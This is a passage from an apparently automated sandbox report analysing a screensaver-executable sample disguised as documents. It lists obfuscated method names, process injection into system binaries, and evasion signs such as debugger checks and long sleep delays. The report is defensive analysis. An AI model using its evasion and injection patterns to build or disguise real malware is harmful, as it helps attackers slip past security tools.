                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C64797 push ebx; iretd 6_2_00C647E9
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C6477B push ebx; iretd 6_2_00C647E9
                Source: PASU5160894680 DOCS.scr.exe Static PE information: section name: .text entropy: 7.961122101465982
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, W9j0hNrclYvl2EJnE9.csHigh entropy of concatenated method names: 'yNWQXpn2HA', 'rYcQkd2MHP', 'WZDQRNElat', 'RX4QMg4Iec', 'iKJQEBJo7Z', 'l8pRSyE3Xm', 'SUHROQB3bn', 'q8gRLogBQ8', 'ArfRDFCQ5s', 'lEYRCavPMm'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, SYHGI3689qTBw0EhYk.csHigh entropy of concatenated method names: 'xdDMULrtJp', 'YsvMxLc2hn', 'zJcMQJhynI', 'cYjQ1kXWjM', 'jH8Qz2dgaC', 'HpmMjT5IDI', 'wmtMqkPaB7', 'mSTM75JnmB', 'IimMBDnpLg', 'IN4MoAVdm0'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, A4XqRQkhHlmMIqCpGN.csHigh entropy of concatenated method names: 'Dispose', 'TkjqClJ9fs', 'Y8t721yEXm', 'lhOOOH8CPj', 'xEHq1daUMJ', 'tI8qzx7IGJ', 'ProcessDialogKey', 'o8K7jn9Iv4', 'aca7qfXK1h', 'pjl77IIvMC'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, VtvmtCHuFwanI5JuSv.csHigh entropy of concatenated method names: 'X0hxm1JKlb', 'uiaxWZ9ogQ', 'xiaxJnKWmP', 'oDqxHxmnIw', 'frFxIvRaUW', 'IA4xTOXCkw', 'zHsxffOub3', 'agxxa4kREp', 'mxoxP59bGj', 'vGtxYRlX1l'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, n5o3CtEHtQcW8gVMs0.csHigh entropy of concatenated method names: 'vSABXPmQCb', 'VbSBUrnyhM', 'tZdBkuZeEH', 'XGGBxMM45q', 'uBUBReMEIv', 'rDZBQYkDia', 'CRcBMdsmCM', 'MJtBEBguXE', 'JcLBKsOoQ7', 'LG2B8QbPWY'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, SZCI26qjQxOuNujNBtL.csHigh entropy of concatenated method names: 'CE9PN9hs5i', 'O9ePZAHSZr', 'u0GPGKBUwq', 'KttPmsDsSD', 'kZePFgGp1k', 'IX4PW9Qbrq', 'NtsP4YuOy4', 'FXTPJ5rBkJ', 'o27PHwFJks', 'hDpPgNvC1V'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, qLenhw5Sm7Lh6igBYm.csHigh entropy of concatenated method names: 'y2T3JSI97E', 'wbQ3HxG7r1', 'M7u3r6NrpR', 'lrb32nYpJg', 'nAp3vOUwUl', 'Mb43y8QY3q', 'pKY36OEsbw', 'elf3bqoJnP', 'EpG3uUbKxA', 'Q3L3leLol4'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, k1AUgJoTmD0W47iTUw.csHigh entropy of concatenated method names: 'RWyqMOPHjj', 'r1DqEReOpD', 'YuFq8wanI5', 'DuSqtvmh58', 'aUWqIZkL9j', 'ThNqTclYvl', 'LNyXUioRW6sWETFDkF', 'ywsYPoZbPWiUfQGxTD', 'EPLqqs4gBY', 'QE5qBwo612'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, bYKcFY7cuY0EWdIDkW.csHigh entropy of concatenated method names: 'GX0GXhYvC', 'nFHmGBROm', 'vfPWJC05N', 'vpR4FYHrf', 'uM0HC7Gny', 'vTPgaTy2T', 'jgbQ8msyxsjnLsRGGu', 'gCITGxwbXTBjgFuLUy', 'B4na3JfpR', 'I63YbYs2K'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, JOPHjjJP1DReOpDY0L.csHigh entropy of concatenated method names: 'i1skc05PDr', 'KK5keWQRlY', 'H1VkhJwtin', 'SoBk0cmIML', 'EEBkS9bqfA', 'rBbkOY4bb4', 'mtokLqk2ZP', 'J8NkDON2oy', 'xvfkC3qT2B', 'xddk1CC4as'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, AAWUNAzsprCkGEZgdJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'K33P3LWSaY', 'jo4PIxVWVl', 'BPAPTaeoxH', 'sEuPf0fx3L', 'YckPaZGT7V', 'MaDPPS4wZd', 'YjYPYTyIw8'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, oIvMCA10UN5HX1BU7M.csHigh entropy of concatenated method names: 'rcfPqAPZH6', 'ogiPB9W7aQ', 'yYyPocv8Wx', 'CkmPUyy0dq', 'tHaPkLKHM7', 'N7RPRq6jKB', 'vXsPQu1dr3', 'clWaLn1NQc', 'lboaDpHUHU', 'TZcaC5TMH9'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, NryRmlOIi6e1KpF7D5.csHigh entropy of concatenated method names: 'gVvfDN4BbY', 'MSwf1BRXVh', 'CtdajJmiTX', 'i2KaqgCR3u', 'nktflmJhO1', 'yy6fd6p0Eb', 'hZRf5u1loO', 'WsefcM2p1x', 'hqBfeioe0J', 'KmQfh2j1yj'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, kHdaUMDJYI8x7IGJI8.csHigh entropy of concatenated method names: 'IVEaUPTxEK', 'Gsvakfk3TI', 'cD8ax3yebM', 'oA7aR37YLE', 'YxyaQW5qa2', 'eGUaMSOGC8', 'z6kaEMfrT2', 'HAhaKZ3hKr', 'AIda8aAwFQ', 'Gw1atGbASY'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, ln9Iv4CjcafXK1hTjl.csHigh entropy of concatenated method names: 'SJ7arIJkvy', 'h22a2m0x6A', 'uKZaACSX7o', 'WOQavC9qlh', 'zUTacwabwE', 'MCFaykQAqS', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, Cv0gD6cuYxRYG4BACB.csHigh entropy of concatenated method names: 'u9jIuLs4S6', 'skDIdA4lUW', 'wYpIcYUqwB', 'sttIe3A5vX', 'vWCI2i28K9', 'G6bIApJmF7', 'MSjIvAom40', 'TNxIy79aIH', 'LMeIpQ7vbA', 'tktI6h2TDM'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, DJgbrHqBZJQYLJgo1mB.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'giJYcNVkSg', 'ijFYeNKJG9', 'AkuYhwY5LH', 'LPpY0cP1LN', 'Y6BYSDBuqe', 'WdlYO0Y6mi', 'dmPYLF2pd3'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, Ah58cHg4t3yBSjUWZk.csHigh entropy of concatenated method names: 'O5nRF41oUs', 'BeNR4nYnk3', 'XLfxAgafyG', 'iU6xvhruBV', 'iO6xyIu6X6', 'oH6xp9PDZi', 'OE3x6497Bn', 'FFTxbecv8j', 'tKNx9MMtog', 'HZIxubkjib'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, khrQWT9aJS2Tbn07Yp.csHigh entropy of concatenated method names: 'Hc4MNWXhMt', 'F7pMZrMjdI', 'hmGMGaubUA', 'ASkMmFUuXH', 'dKxMFIuUq0', 'foXMWXGdsQ', 'xl9M4ocgS3', 'f0oMJ7Ehxx', 'UG6MHxTKX4', 'QWqMgpdwQM'

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: PASU5160894680 DOCS.scr.exe PID: 7336, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Memory allocated: 1610000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Memory allocated: 33C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Memory allocated: 53C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Memory allocated: 80D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Memory allocated: 90D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Memory allocated: 9280000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Memory allocated: A280000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0561096E rdtsc 4_2_0561096E
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6378
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2595
                Source: C:\Windows\SysWOW64\control.exe Window / User API: threadDelayed 4439
                Source: C:\Windows\SysWOW64\control.exe Window / User API: threadDelayed 5533
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\control.exe API coverage: 3.1 %
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe TID: 7356 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7664 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\control.exe TID: 7952 Thread sleep count: 4439 > 30
                Source: C:\Windows\SysWOW64\control.exe TID: 7952 Thread sleep time: -8878000s >= -30000s
                Source: C:\Windows\SysWOW64\control.exe TID: 7952 Thread sleep count: 5533 > 30
                Source: C:\Windows\SysWOW64\control.exe TID: 7952 Thread sleep time: -11066000s >= -30000s
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe TID: 8056 Thread sleep time: -75000s >= -30000s
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe TID: 8056 Thread sleep count: 35 > 30
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe TID: 8056 Thread sleep time: -52500s >= -30000s
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe TID: 8056 Thread sleep count: 42 > 30
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe TID: 8056 Thread sleep time: -42000s >= -30000s
                Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C6C1D0 FindFirstFileW,FindNextFileW,FindClose, 6_2_00C6C1D0
                Source: uFLByAWAOFbhtV.exe, 0000000A.00000002.4132823778.000000000145F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                Source: control.exe, 00000006.00000002.4132398440.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2139906459.000001998891C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_00417283 LdrLoadDll, 4_2_00417283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560656A mov eax, dword ptr fs:[00000030h] 4_2_0560656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560273C mov eax, dword ptr fs:[00000030h]4_2_0560273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560273C mov ecx, dword ptr fs:[00000030h]4_2_0560273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560273C mov eax, dword ptr fs:[00000030h]4_2_0560273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560C700 mov eax, dword ptr fs:[00000030h]4_2_0560C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05600710 mov eax, dword ptr fs:[00000030h]4_2_05600710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0565E7E1 mov eax, dword ptr fs:[00000030h]4_2_0565E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DC7C0 mov eax, dword ptr fs:[00000030h]4_2_055DC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056507C3 mov eax, dword ptr fs:[00000030h]4_2_056507C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D47FB mov eax, dword ptr fs:[00000030h]4_2_055D47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D47FB mov eax, dword ptr fs:[00000030h]4_2_055D47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F27ED mov eax, dword ptr fs:[00000030h]4_2_055F27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F27ED mov eax, dword ptr fs:[00000030h]4_2_055F27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F27ED mov eax, dword ptr fs:[00000030h]4_2_055F27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056847A0 mov eax, dword ptr fs:[00000030h]4_2_056847A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567678E mov eax, dword ptr fs:[00000030h]4_2_0567678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D07AF mov eax, dword ptr fs:[00000030h]4_2_055D07AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A660 mov eax, dword ptr fs:[00000030h]4_2_0560A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A660 mov eax, dword ptr fs:[00000030h]4_2_0560A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569866E mov eax, dword ptr fs:[00000030h]4_2_0569866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0569866E mov eax, dword ptr fs:[00000030h]4_2_0569866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05602674 mov eax, dword ptr fs:[00000030h]4_2_05602674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EC640 mov eax, dword ptr fs:[00000030h]4_2_055EC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05606620 mov eax, dword ptr fs:[00000030h]4_2_05606620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05608620 mov eax, dword ptr fs:[00000030h]4_2_05608620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E260B mov eax, dword ptr fs:[00000030h]4_2_055E260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E609 mov eax, dword ptr fs:[00000030h]4_2_0564E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D262C mov eax, dword ptr fs:[00000030h]4_2_055D262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05612619 mov eax, dword ptr fs:[00000030h]4_2_05612619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055EE627 mov eax, dword ptr fs:[00000030h]4_2_055EE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056506F1 mov eax, dword ptr fs:[00000030h]4_2_056506F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056506F1 mov eax, dword ptr fs:[00000030h]4_2_056506F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E6F2 mov eax, dword ptr fs:[00000030h]4_2_0564E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E6F2 mov eax, dword ptr fs:[00000030h]4_2_0564E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E6F2 mov eax, dword ptr fs:[00000030h]4_2_0564E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E6F2 mov eax, dword ptr fs:[00000030h]4_2_0564E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0560A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560A6C7 mov eax, dword ptr fs:[00000030h]4_2_0560A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560C6A6 mov eax, dword ptr fs:[00000030h]4_2_0560C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D4690 mov eax, dword ptr fs:[00000030h]4_2_055D4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D4690 mov eax, dword ptr fs:[00000030h]4_2_055D4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056066B0 mov eax, dword ptr fs:[00000030h]4_2_056066B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D6154 mov eax, dword ptr fs:[00000030h]4_2_055D6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D6154 mov eax, dword ptr fs:[00000030h]4_2_055D6154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CC156 mov eax, dword ptr fs:[00000030h]4_2_055CC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4164 mov eax, dword ptr fs:[00000030h]4_2_056A4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4164 mov eax, dword ptr fs:[00000030h]4_2_056A4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05664144 mov eax, dword ptr fs:[00000030h]4_2_05664144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05664144 mov eax, dword ptr fs:[00000030h]4_2_05664144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05664144 mov ecx, dword ptr fs:[00000030h]4_2_05664144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05664144 mov eax, dword ptr fs:[00000030h]4_2_05664144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05664144 mov eax, dword ptr fs:[00000030h]4_2_05664144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05668158 mov eax, dword ptr fs:[00000030h]4_2_05668158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05600124 mov eax, dword ptr fs:[00000030h]4_2_05600124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov eax, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov ecx, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov eax, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov eax, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov ecx, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov eax, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov eax, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov ecx, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov eax, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567E10E mov ecx, dword ptr fs:[00000030h]4_2_0567E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05690115 mov eax, dword ptr fs:[00000030h]4_2_05690115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567A118 mov ecx, dword ptr fs:[00000030h]4_2_0567A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567A118 mov eax, dword ptr fs:[00000030h]4_2_0567A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567A118 mov eax, dword ptr fs:[00000030h]4_2_0567A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0567A118 mov eax, dword ptr fs:[00000030h]4_2_0567A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A61E5 mov eax, dword ptr fs:[00000030h]4_2_056A61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056001F8 mov eax, dword ptr fs:[00000030h]4_2_056001F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056961C3 mov eax, dword ptr fs:[00000030h]4_2_056961C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056961C3 mov eax, dword ptr fs:[00000030h]4_2_056961C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E1D0 mov eax, dword ptr fs:[00000030h]4_2_0564E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E1D0 mov eax, dword ptr fs:[00000030h]4_2_0564E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0564E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E1D0 mov eax, dword ptr fs:[00000030h]4_2_0564E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564E1D0 mov eax, dword ptr fs:[00000030h]4_2_0564E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CA197 mov eax, dword ptr fs:[00000030h]4_2_055CA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CA197 mov eax, dword ptr fs:[00000030h]4_2_055CA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CA197 mov eax, dword ptr fs:[00000030h]4_2_055CA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0568C188 mov eax, dword ptr fs:[00000030h]4_2_0568C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0568C188 mov eax, dword ptr fs:[00000030h]4_2_0568C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05610185 mov eax, dword ptr fs:[00000030h]4_2_05610185
